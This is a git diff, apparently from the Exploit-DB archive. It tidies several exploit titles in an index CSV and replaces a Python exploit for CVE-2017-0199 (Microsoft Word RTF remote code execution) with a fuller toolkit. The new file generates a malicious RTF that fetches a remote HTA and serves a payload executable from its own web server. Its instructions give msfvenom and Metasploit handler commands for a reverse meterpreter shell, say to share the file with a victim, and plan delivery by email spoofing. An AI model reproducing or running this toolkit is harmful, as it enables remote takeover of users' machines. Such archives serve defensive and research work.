diff --git a/files.csv b/files.csv index 5e7787243..690e0fa14 100644 --- a/files.csv +++ b/files.csv @@ -11823,7 +11823,7 @@ id,file,description,date,author,platform,type,port 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 -20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT Remote Code Execution",2012-07-24,muts,linux,remote,0 +20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 - Source Fragment Disclosure",2000-07-17,"Zuo Lei",windows,remote,0 20091,platforms/multiple/remote/20091.txt,"Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,multiple,remote,0 20095,platforms/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - Exploits",2000-07-20,"kevin j",multiple,remote,0 @@ -15449,8 +15449,8 @@ id,file,description,date,author,platform,type,port 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0 41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23 41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0 -41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Remote Root Code Execution",2017-04-18,agix,linux,remote,8000 -41894,platforms/windows/remote/41894.py,"Microsoft Word - .RTF Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0 +41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000 +41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 @@ -16740,7 +16740,7 @@ id,file,description,date,author,platform,type,port 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - 'view_com.php' SQL Injection",2006-08-09,simo64,php,webapps,80 -2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution",2006-08-10,simo64,php,webapps,80 +2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - 'rootpath' Remote Code Execution",2006-08-10,simo64,php,webapps,80 2163,platforms/php/webapps/2163.txt,"PHPWCMS 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 diff --git a/platforms/windows/remote/41894.py b/platforms/windows/remote/41894.py index 5748a0078..2b0e1bf6b 100755 --- a/platforms/windows/remote/41894.py +++ b/platforms/windows/remote/41894.py @@ -1,57 +1,228 @@ ''' -# Exploit Title: Exploit CVE-2017-0199 (Word RTF RCE) vulnerability to gain meterpreter shell -# Date: 17/04/2017 -# Exploit Author: Bhadresh Patel -# Version: Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1. -# CVE : CVE-2017-0199 - -This is an article with video tutorial and tool to gain a meterpreter shell by exploiting CVE-2017-0199 (Word RTF RCE) vulnerability. - -Video tutorial - -https://youtu.be/ymLVH5avkZw - -Steps - -Step-1) Create a malicious RTF -- Start a webserver on attacker machine -- Open MS Office word and insert an innocent remote doc file (innocent.doc) as an object -- Save the file as RTF -- Modify RTF to inject \objupdate control -- Stop the webserver on attacker machine -- Share this RTF file with victim - -Step-2) Create a meterpreter shell on attacker machine -- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe -- Start multi handler - -Step-3) Start attacker script (server.py) -- Specify URL of meterpreter shell -- Specify location of shell - -Step-4) Victim opens the document and an attacker gets a reverse meterpreter shell -''' -import os,sys,thread,socket +## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ## + + + +Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration. + + +### Video tutorial + +https://youtu.be/42LjG7bAvpg + + +### Release note: + +Introduced following capabilities to the script + + - Generate Malicious RTF file using toolkit + - Run toolkit in an exploitation mode as tiny HTA + Web server + +Version: Python version 2.7.13 + +### Future release: + +Working on following feature + + - Automatically send generated malicious RTF to victim using email spoofing + +### Example: + +- Step 1: Generate malicious RTF file using following command and send it to victim + + Syntax: + + # python cve-2017-0199_toolkit.py -M gen -w -u + + Example: + + # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc + + +- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler + + Example: + + Generate Payload: + + # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe + + Start Handler: + + # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" + + +- Step 3: Start toolkit in exploitation mode to deliver payloads + + Syntax: + + # python cve-2017-0199_toolkit.py -M exp -e -l + + Example: + + # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe + + + +### Command line arguments: + + # python cve-2017-0199_toolkit.py -h + + This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) + + Modes: + + -M gen Generate Malicious RTF file only + + Generate malicious RTF file: + + -w Name of malicious RTF file (Share this file with victim). + + -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. + + For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and + + will be requested once victim will open malicious RTF file. + -M exp Start exploitation mode + + Exploitation: + + -p Local port number. + + -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. + + -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally). + + +''' + +import os,sys,thread,socket,sys,getopt BACKLOG = 50 # how many pending connections queue will hold MAX_DATA_RECV = 999999 # max number of bytes we receive at once DEBUG = True # set to True to see the debug msgs -def main(): - - # check the length of command running - if (len(sys.argv)<3): - print "Usage: python ",sys.argv[0]," " - sys.exit(1) - else: - port = int(sys.argv[1]) # port from argument - global payloadurl - global payloadlocation - payloadurl = sys.argv[2] - payloadlocation = sys.argv[3] - # host and port info. - host = '' # blank for localhost +def main(argv): + # Host and Port information + global port + global host + global filename + global docuri + global payloadurl + global payloadlocation + global mode + filename = '' + docuri = '' + payloadurl = '' + payloadlocation = '' + port = int("80") + host = '' + mode = '' + # Capture command line arguments + try: + opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="]) + except getopt.GetoptError: + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit(2) + for opt, arg in opts: + if opt == '-h': + print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n" + print "Modes:\n" + print " -M gen Generate Malicious RTF file only\n" + print " Generate malicious RTF file:\n" + print " -w Name of malicious RTF file (Share this file with victim).\n" + print " -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n" + print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n" + print " will be requested once victim will open malicious RTF file.\n" + print " -M exp Start exploitation mode\n" + print " Exploitation:\n" + print " -p Local port number.\n" + print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n" + print " -l Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).\n" + sys.exit() + elif opt in ("-M","--mode"): + mode = arg + elif opt in ("-w", "--filename"): + filename = arg + elif opt in ("-u", "--docuri"): + docuri = arg + elif opt in ("-p", "--port"): + port = int(arg) + elif opt in ("-e", "--payloadurl"): + payloadurl = arg + elif opt in ("-l", "--payloadlocation"): + payloadlocation = arg + if "gen" in mode: + if (len(filename)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(docuri)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + print "Generating payload" + generate_exploit_rtf() + mode = 'Finished' + if "exp" in mode: + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadlocation)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + print "Running exploit mode - waiting for victim to connect" + exploitation() + mode = 'Finished' + if not "Finished" in mode: + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() +def generate_exploit_rtf(): + # Preparing malicious Doc + s = docuri + docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s) + docuri_pad_len = 224 - len(docuri_hex) + docuri_pad = "0"*docuri_pad_len + uri_hex = "010000020900000001000000000000000000000000000000a4000000e0c9ea79f9bace118c8200aa004ba90b8c000000"+docuri_hex+docuri_pad+"00000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + payload = "{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n" + payload += "{\\info\n" + payload += "{\\author }\n" + payload += "{\\operator }\n" + payload += "}\n" + payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n" + payload += "{\n" + payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n" + payload += "{\\*\\objclass Word.Document.8}\n" + payload += "{\\*\\objdata 0105000002000000\n" + payload += "090000004f4c45324c696e6b000000000000000000000a0000\n" + payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n" + payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n" + payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n" + payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n" + payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n" + payload += uri_hex+"\n" + payload += "0105000000000000}\n" + payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n" + payload += "{\\*\\datastore }\n" + payload += "}\n" + f = open(filename, 'w') + f.write(payload) + f.close() + print "Generated "+filename+" successfully" + +def exploitation(): + print "Server Running on ",host,":",port try: @@ -79,54 +250,56 @@ def main(): s.close() -def printout(type,request,address): - if "Block" in type or "Blacklist" in type: - colornum = 91 - elif "Request" in type: - colornum = 92 - elif "Reset" in type: - colornum = 93 - - print "\033[",colornum,"m",address[0],"\t",type,"\t",request,"\033[0m" - def server_thread(conn, client_addr): # get the request from browser - request = conn.recv(MAX_DATA_RECV) - if (len(request) > 0): - # parse the first line - first_line = request.split('\n')[0] - - # get method - method = first_line.split(' ')[0] - # get url - url = first_line.split(' ')[1] - check_exe_request = url.find('.exe') - if (check_exe_request > 0): - print "Received request for payload from "+client_addr[0] - size = os.path.getsize(payloadlocation) - data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" - with open(payloadlocation) as fin: - data +=fin.read() + try: + request = conn.recv(MAX_DATA_RECV) + if (len(request) > 0): + # parse the first line + first_line = request.split('\n')[0] + + # get method + method = first_line.split(' ')[0] + # get url + try: + url = first_line.split(' ')[1] + except IndexError: + print "Invalid request from "+client_addr[0] + conn.close() + sys.exit(1) + check_exe_request = url.find('.exe') + if (check_exe_request > 0): + print "Received request for payload from "+client_addr[0] + try: + size = os.path.getsize(payloadlocation) + except OSError: + print "Unable to read"+payloadlocation + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" + with open(payloadlocation) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + if method in ['GET', 'get']: + print "Received GET method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n\r\n" + conn.send(data) + conn.close() + if method in ['OPTIONS', 'options']: + print "Receiver OPTIONS method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:47:14 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nAllow: OPTIONS,HEAD,GET\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html" + conn.send(data) + conn.close() + if method in ['HEAD', 'head']: + print "Received HEAD method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/doc\r\n\r\n" conn.send(data) conn.close() sys.exit(1) - if method in ['GET', 'get']: - print "Received GET method from "+client_addr[0] - data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n\r\n" - conn.send(data) - conn.close() - if method in ['OPTIONS', 'options']: - print "Receiver OPTIONS method from "+client_addr[0] - data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:47:14 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nAllow: OPTIONS,HEAD,GET\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html" - conn.send(data) - conn.close() - if method in ['HEAD', 'head']: - print "Received HEAD method from "+client_addr[0] - data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/doc\r\n\r\n" - conn.send(data) - conn.close() - sys.exit(1) - + except socket.error, ex: + print ex if __name__ == '__main__': - main() + main(sys.argv[1:])